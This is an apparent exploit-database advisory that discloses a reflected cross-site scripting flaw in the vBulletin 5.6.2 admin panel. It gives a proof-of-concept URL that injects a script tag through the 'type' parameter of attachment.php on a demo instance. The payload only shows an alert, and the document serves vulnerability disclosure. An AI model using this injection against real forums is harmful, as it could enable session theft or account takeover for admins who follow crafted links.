vBulletin 5.6.2 Cross Site Scripting

2020.08.14
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: vBulletin 5.6.2 Cross Site Scripting # Date:12.08.2020 # Author: Vincent666 ibn Winnie # Software Link: https://www.vbulletin.com/en/features/ # Tested on: Windows 10 # Web Browser: Mozilla Firefox # Blog : https://pentest-vincent.blogspot.com/ # PoC: https://pentest-vincent.blogspot.com/2020/08/cross-site-scripting-in-vbulletin-ver.html So.. We have a cross site scripting in the vBulletin 5.6.2 PoC: I use demo admin panel for test. Our vuln link : https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=[our xss is here] Full link with code: https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=%22%22%3E%3Cscript%3Ealert(%22cross%20site%20scripting%20%22)%3C/script%3E Picture: https://imgur.com/a/OicFHyA


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top